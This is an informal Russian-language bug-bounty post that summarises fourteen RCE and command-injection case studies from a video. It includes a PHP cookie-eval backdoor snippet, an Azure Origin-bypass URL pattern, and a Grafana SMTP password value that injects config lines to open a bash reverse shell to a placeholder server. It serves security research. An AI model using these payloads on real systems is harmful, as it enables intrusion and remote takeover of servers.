Remote Code Execution | Command Injection


RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.

1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.

2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.

3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}

4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.

5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./

6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.

7. RCE через SQL инъекцию. PoC.

8. Dependency Confusion. Об этом типе атак я делал пост ранее.

9. 0day уязвимости: Secure VPN.

10. RCE через картинки: ExifTool.

11. RCE через инъекцию опций в git.

12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"

13. Классический RCE через SSRF через Gopher. Статья.

14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.


#rce